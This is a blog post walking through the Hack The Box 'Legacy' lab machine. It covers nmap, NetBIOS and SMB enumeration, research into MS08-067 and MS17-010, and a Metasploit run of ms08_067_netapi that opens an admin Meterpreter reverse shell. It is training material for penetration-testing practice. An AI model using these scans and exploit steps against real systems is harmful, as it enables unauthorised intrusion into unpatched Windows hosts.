<!DOCTYPE html>
<html lang="en">

  <head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.6.1 -->
<title>Legacy HTB Writeup | Zack Jones</title>
<meta name="generator" content="Jekyll v4.1.1" />
<meta property="og:title" content="Legacy HTB Writeup" />
<meta name="author" content="Zack Jones" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="The Legacy HTB machine was one of the first HTB machines I ever broke into. It’s a retired box that is pretty basic, leaning towards understanding basic methodology and how to make use of CVEs that you find on a box. It’s a good start for practicing for the OSCP." />
<meta property="og:description" content="The Legacy HTB machine was one of the first HTB machines I ever broke into. It’s a retired box that is pretty basic, leaning towards understanding basic methodology and how to make use of CVEs that you find on a box. It’s a good start for practicing for the OSCP." />
<link rel="canonical" href="http://localhost:4000/infosec/2020/05/15/Legacy-HTB-Writeup.html" />
<meta property="og:url" content="http://localhost:4000/infosec/2020/05/15/Legacy-HTB-Writeup.html" />
<meta property="og:site_name" content="Zack Jones" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-05-15T18:00:00-04:00" />
<script type="application/ld+json">
{"datePublished":"2020-05-15T18:00:00-04:00","@type":"BlogPosting","description":"The Legacy HTB machine was one of the first HTB machines I ever broke into. It’s a retired box that is pretty basic, leaning towards understanding basic methodology and how to make use of CVEs that you find on a box. It’s a good start for practicing for the OSCP.","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/infosec/2020/05/15/Legacy-HTB-Writeup.html"},"url":"http://localhost:4000/infosec/2020/05/15/Legacy-HTB-Writeup.html","author":{"@type":"Person","name":"Zack Jones"},"headline":"Legacy HTB Writeup","dateModified":"2020-05-15T18:00:00-04:00","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Zack Jones" /></head>

  <!-- Global Site Tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-106768649-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments)};
  gtag('js', new Date());

  gtag('config', 'UA-106768649-1');
</script>



  <body>

    <header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Zack Jones</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/feed/">Feed</a><a class="page-link" href="/Resume/">Resume</a><a class="page-link" href="/Blog/">Blog</a><a class="page-link" href="/Cisco/">Cisco</a><a class="page-link" href="/InfoSec/">InfoSec</a><a class="page-link" href="/Linux/">Linux</a><a class="page-link" href="/networking/">Networking</a><a class="page-link" href="/Server/">Server</a></div>
      </nav></div>
</header>


    <main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Legacy HTB Writeup</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2020-05-15T18:00:00-04:00" itemprop="datePublished">May 15, 2020
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>The Legacy HTB machine was one of the first HTB machines I ever broke into. It’s a retired box that is pretty basic, leaning towards understanding basic methodology and how to make use of CVEs that you find on a box. It’s a good start for practicing for the OSCP.</p>

<p><img src="/assets/img/Walkthroughs/Legacy/Website_shot.png" alt="Website Screenshot" /></p>

<p>If this writeup isn’t enough, HTB does include <a href="https://www.hackthebox.eu/home/machines/profile/2">a writeup</a> on the site. There are also plenty of videos online how to do this box as well.</p>

<p><strong>Okay let’s get into it</strong></p>

<h3 id="scanning-the-machine">Scanning the machine</h3>
<p>So from HTB we already know the IP address is <code>10.10.10.4</code> so as long as our OpenVPN connection is setup we should be able to start banging on it.</p>

<p>I’m going to scan this in a few different ways. First let’s do a basic nmap.</p>

<h4 id="basic-nmap">Basic nmap</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap 10.10.10.4
</code></pre></div></div>
<p>or in case it has trouble</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -Pn 10.10.10.4
</code></pre></div></div>

<p><img src="/assets/img/Walkthroughs/Legacy/basic_nmap.png" alt="Basic nmap scan" /></p>

<p>This scan will give us some basic information. It’s good to do this scan first to see if there are any ports you can start to enumearte while waiting for larger scans.<br />
From this we can guess it might have something to do with SMB. How?<br />
<strong>SMB</strong></p>
<ul class="task-list">
  <li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Has older SMB port 139. SMB used to run on 139 on top of netbios</li>
  <li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Has newer SMB port 445. After Windows 2000, SMB was moved to this port.<br />
It’s not enough for full confidence but it’s enough to start to see where we might be going with this.</li>
</ul>

<p>Let’s run a couple bigger scans.</p>

<p><strong>Note:</strong> The next two scans can be run back to back but if you run the nmapAutomator.sh script, it includes the nmap scan I’m about to show you.</p>

<h4 id="big-nmap-scan">“Big nmap” scan</h4>
<p>I personally call this the big nmap. It’s a scan that will scan all ports, and run anything it can against it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -T4 -A -p- 10.10.10.4
</code></pre></div></div>
<p>I kept <code>-Pn</code> just because.</p>

<p><img src="/assets/img/Walkthroughs/Legacy/big_nmap.png" alt="big nmap " /></p>

<p>Before we run the next scan, lets go ahead and see what we can find from this.</p>
<ul>
  <li>Still looks like SMB</li>
  <li>SMB Security looks weak - <code>message_signing: disabled</code></li>
  <li>Evidence that it is an older Windows machine, most likely XP.</li>
  <li>Computer name is ‘Legacy’</li>
  <li>Workgroup is ‘HTB’</li>
  <li>Maybe possible to enumerate Netbios</li>
  <li>Has directory services enabled</li>
</ul>

<p>Okay let’s run the nmapAutomator.sh scan.</p>

<h4 id="nmapautomatorsh">nmapAutomator.sh</h4>
<p>Before we run this scan, let’s talk about it a bit.<br />
nmapAutomator.sh is a bash script written by Github users <strong>21y4d, austinsonger, and Knowledge_Wisdom_Understanding</strong> and can be found on <a href="https://github.com/21y4d/nmapAutomator">Github here.</a></p>

<p>It will run a handful of scans at the same time for you including:</p>
<ul>
  <li>sslscan</li>
  <li>nikto</li>
  <li>wpscan</li>
  <li>smbmap</li>
  <li>etc.</li>
</ul>

<p>So let’s run a full scan and see how it goes.<br />
The scan is quite lengthy so I won’t be posting a screenshot of the whole thing, but if you want to see the whole scan, you can watch it here. <a href="https://asciinema.org/a/MnWeg5pekvWqu44AWeiSqOO9v"><img src="https://asciinema.org/a/MnWeg5pekvWqu44AWeiSqOO9v.svg" alt="asciicast" /></a></p>

<p>This scan basically just confirmed what we found from previous scans. But it did give some particularly interesting information on the SMB situation.
<img src="/assets/img/Walkthroughs/Legacy/nmapauto_vulns.png" alt="SMB Vulnerabilities" /></p>

<p>So now we know that this machine has two CVEs marked as vulnerable.</p>
<ul>
  <li>CVE-2008-4250</li>
  <li>CVE-2017-0143</li>
</ul>

<p>At this point we could probably start poking at these CVEs but let’s try to dig in a bit further before attacking the machine.</p>

<h4 id="netbios-enumeration">Netbios enumeration</h4>
<p>So with netbios there are a couple ways we can enumerate it. The first way is to run <code>nbtscan</code> on it to see what services we can see. We are looking for information about it being connected to a domain or a some sort of file server service.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nbtscan -vh 10.10.10.4
</code></pre></div></div>
<p>After running this we see that it in fact has a file server service running as well as a few others listed. This is good information for us.</p>

<p><img src="/assets/img/Walkthroughs/Legacy/nbtscan.png" alt="Nbtscan" /></p>

<h4 id="smb-enumeration">SMB enumeration</h4>
<p>Okay so when we ran our big nmap scan we got plenty of information on SMB but let’s just run some SMB specific enumerations real fast just for the heck of it. Let’s start with smbclient.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>smbclient -L \\\\10.10.10.4\\\
smbclient -N -L \\\10.10.10.4\\

</code></pre></div></div>
<p>smbclient is a small application similar to FTP. It may allow you to view files from the server. It also allows to put files on the server, view files, etc. In some cases you will be able to log in anonymously.</p>

<p><img src="/assets/img/Walkthroughs/Legacy/smbclient.png" alt="smbclient" /></p>

<p><strong>EDIT</strong></p>

<blockquote>
  <p>Alright so. When I wrote this post I didn’t realize what this error was coming from. After doing some research I realized that my .conf file that handles smb client was configured to run a newer version of SMB. So, if you run into this, I have a quick writeup on how to fix it <a href="/linux/2020/09/30/SMB-Enumeration-Issue-Fix.html">here</a></p>

  <p><img src="/assets/img/Walkthroughs/Legacy/smbclientupdated.png" alt="SMBclientUpdated" /></p>

  <p>After changing the conf file. This is what it looked like. To be expected. Invalid parameter means it doesn’t like a blank password.</p>
</blockquote>

<p><strong>Note:</strong> <em>smbmap is also a great tool for enumerating SMB, in paticular when working with Active Directory or domains.</em></p>

<p>Another way to enumerate SMB is to use nmap with the SMB script. We have already done this in the big nmap scan we did previously, but if you wanted to run it again it would look like this.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -p 445 --script smb-os-discovery 10.10.10.4
</code></pre></div></div>

<p>Lastly, you should know that Metasploit has amazing auxiliary scanners. You can use Metasploit to search keywords and then go from there. You’ll find an auxiliary module called <code class="language-plaintext highlighter-rouge">auxiliary/scanner/smb/smb_version</code> that is useful here. The steps here are basic.</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">use</code> and the module name.</li>
  <li><code class="language-plaintext highlighter-rouge">options</code> to view what needs to be set</li>
  <li><code class="language-plaintext highlighter-rouge">set</code> each option as needed.</li>
  <li><code class="language-plaintext highlighter-rouge">run</code> to run the module.</li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf5 &gt; use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) &gt; options

Module options (auxiliary/scanner/smb/smb_version):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'
SMBDomain  .                no        The Windows domain to use for authentication
SMBPass                     no        The password for the specified username
SMBUser                     no        The username to authenticate as
THREADS    1                yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_version) &gt; set RHOSTS
[-] Unknown variable
Usage: set [option] [value]

Set the given option to value.  If value is omitted, print the current value.
If both are omitted, print options that are currently set.

If run from a module context, this will set the value in the module's
datastore.  Use -g to operate on the global datastore.

If setting a PAYLOAD, this command can take an index from `show payloads'.

msf5 auxiliary(scanner/smb/smb_version) &gt; set RHOSTS 10.10.10.4
RHOSTS =&gt; 10.10.10.4
msf5 auxiliary(scanner/smb/smb_version) &gt; run

[+] 10.10.10.4:445        - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB ) (signatures:optional)
[*] 10.10.10.4:445        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
</code></pre></div></div>
<p>Sweet so this specifically tells us a few things.</p>
<ul>
  <li>Windows XP SP3</li>
  <li>Host name is LEGACY</li>
  <li>Workgroup is called HTB</li>
</ul>

<p>This is pretty good information to have.</p>
<h3 id="digging-into-the-cves">Digging into the CVEs</h3>

<p>So there are two CVEs that we noticed earlier. There are loads of ways to search these to find out more information about the machine. I always suggest doing a few different searches to find out basic information and also confirm what you’ve read. If you’re just looking at one post, you’re probably missing out on a lot of information. Below is a bit of research I did on both CVEs. I’ve included the links I felt were important as well.</p>

<p>Before we hit Google, lets try a little <strong>Searchsploit</strong>… starting with <strong>CVE-2008-4250</strong></p>

<h4 id="cve-2008-4250">CVE-2008-4250</h4>

<p><strong>Searchsploit</strong>
<img src="/assets/img/Walkthroughs/Legacy/SearchSploit-MS08-067.png" alt="MS08-067 SearchSploit" /></p>

<p>Notice that when I searched for it by CVE I got nothing. That’s why searching in different places is so important. I knew to also search MS08-067 because of this next page…</p>

<p><strong>CVEDetails.com</strong></p>

<p><a href="https://www.cvedetails.com/cve/CVE-2008-4250/">CVE Details link</a><br />
<img src="/assets/img/Walkthroughs/Legacy/CVE-Details-2008-4250.png" alt="CVE Screenshot" /> <br />
The CVE Details page always gives loads of information. Here is the take away.</p>

<ul>
  <li>Allows for Remote Code Execution - <em>Exactly what we want to hear when trying to gain initial access</em></li>
  <li>Has Metasploit Module ;)</li>
  <li>Works on older Windows Servers between 2000-2008</li>
  <li>Highest level of risk - CVSS Score of 10</li>
  <li>Authentication not required for exploit</li>
  <li>Complexity is low</li>
  <li>Access gained - Admin</li>
  <li>Also known as MS08-067 (This is useful for doing further research)</li>
</ul>

<p>So in theory a Metasploit module can <strong>do the work for us, get us in</strong>, and not only that but already <strong>be admin level</strong>. Note taken!</p>

<p><strong>Exploit-db.com</strong></p>

<p><a href="https://www.exploit-db.com/exploits/7132">Exploit-db link</a></p>

<p><img src="/assets/img/Walkthroughs/Legacy/EDB-7132.png" alt="EDB-7132" /></p>

<p>Okay so this is literally the exploit for this particular vulnerability published online. Great. From the site we can tell that</p>
<ul>
  <li>Is Verified by EDB to work.</li>
  <li>Written in python</li>
  <li>Has some python dependencies</li>
  <li>Takes arguments based on which OS you’re targeting, i.e. has multiple payloads</li>
  <li>Sets up a listener on port 4444</li>
  <li>exploit portion of the script is shellcode for a portbind that came from Metasploit.</li>
  <li>Was listed ‘7132.py’ in our searchsploit results.</li>
</ul>

<p>If our enumeration has been correct so far, this is almost a stopping point. We know the OS, SMB version, the CVE, and the exploit. And everything lines up really well. Not a lot of chances for failure here. But always keep reading before firing something off, your little copy and paste pew pew could really wreck a machine if you’re not careful.</p>

<h4 id="cve-2017-0143">CVE-2017-0143</h4>
<p>Okay so before we dig into this. Think back to 2017 and try to remember some sort of massive worldwide scare involving SMB… do you remember? Yeahhhhhh. WannaCry? This bad boy right here is also known as MS17-010. I imagine this machine could be broken into using either of these CVEs but I chased the above method. But for reference, here are some links.</p>

<p>https://www.exploit-db.com/exploits/41891<br />
https://www.cvedetails.com/cve/CVE-2017-0143/</p>

<h4 id="exploitation-and-gaining-access">Exploitation and Gaining Access</h4>

<p><strong>Trying out CVE-2008-4250 aka MS08-067</strong></p>

<p>So this exploit has two methods, Metasploit and of course finding the exploit online. Or I mean… if you’re a big shot, maybe develop your own exploit.</p>

<h4 id="manual-exploit">Manual Exploit</h4>
<blockquote>
  <p>Adding this section soon</p>
</blockquote>

<h4 id="metasploit">Metasploit</h4>
<p>After I saw that Metasploit was an option here, I quickly fired a Metasploit missile at this silly boy. You can use the search function in Metasploit to find a module called <code class="language-plaintext highlighter-rouge">exploit/windows/smb/ms08_067_netapi</code>. It was super easy to run. Note that sometimes exploits revolving around MS08-067 and MS17-010 can be finicky. You might have to try it a couple times. Here is what it looked like in Metasploit.</p>

<ul>
  <li>Search for the exploit</li>
  <li>use the <code class="language-plaintext highlighter-rouge">use</code> command and the name of the exploit</li>
  <li>check the options with <code class="language-plaintext highlighter-rouge">options</code></li>
  <li>set necessary <code class="language-plaintext highlighter-rouge">options</code></li>
  <li><code class="language-plaintext highlighter-rouge">run</code></li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf5 &gt; use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) &gt; options

Module options (exploit/windows/smb/ms08_067_netapi):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'
RPORT    445              yes       The SMB service port (TCP)
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id  Name
--  ----
0   Automatic Targeting

msf5 exploit(windows/smb/ms08_067_netapi) &gt; rhosts 10.10.10.4
[-] Unknown command: rhosts.
msf5 exploit(windows/smb/ms08_067_netapi) &gt; set rhosts 10.10.10.4
rhosts =&gt; 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) &gt; run

[*] Started reverse TCP handler on 10.10.14.17:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.17:4444 -&gt; 10.10.10.4:1031) at 2020-05-11 23:01:23 -0400

meterpreter &gt;
</code></pre></div></div>

<p>Boom you’ve got a meterpreter shell and if you check, you’re big boy admin with all the rights in the world. Yes this hack was pretty easy, yes it’s based off of a massive vulnerability that hit the news which means every IT guy and gal across the globe knows about it and hopefully that means they are all patched up. But. That is wishful thinking. I have to say the biggest value in this is that is was a really rewarding hack. It was my first HTB and for a lot of folks reading this, it’s probably theirs as well. Or… it should be I would say. There is massive value in doing easy boxes like this for your confidence. It gives so much momentum that tackling harder boxes are just a little bit less scary. SO. That’s it. I hope this helps. If I said something stupid or lied or anything else, feel free to reach out.<br />
 Twitter - <a href="https://twitter.com/mehhsecurity">@mehhsecurity</a><br />
 Email is <strong>hi.imzackjones@gmail.com</strong></p>

<p>Cheers, 
Zack.</p>


  </div><a class="u-url" href="/infosec/2020/05/15/Legacy-HTB-Writeup.html" hidden></a>
</article>

      </div>
    </main>

    <footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">Zack Jones</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">Zack Jones</li><li><a class="u-email" href="mailto:hi.imzackjones@gmail.com">hi.imzackjones@gmail.com</a></li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/hiimzackjones"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">hiimzackjones</span></a></li><li><a href="https://www.twitter.com/mehhsecurity"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">mehhsecurity</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>A very Mehh Networking and Cybersecurity online notebook and blog.
</p>
      </div>
    </div>

  </div>

</footer>


  </body>

</html>
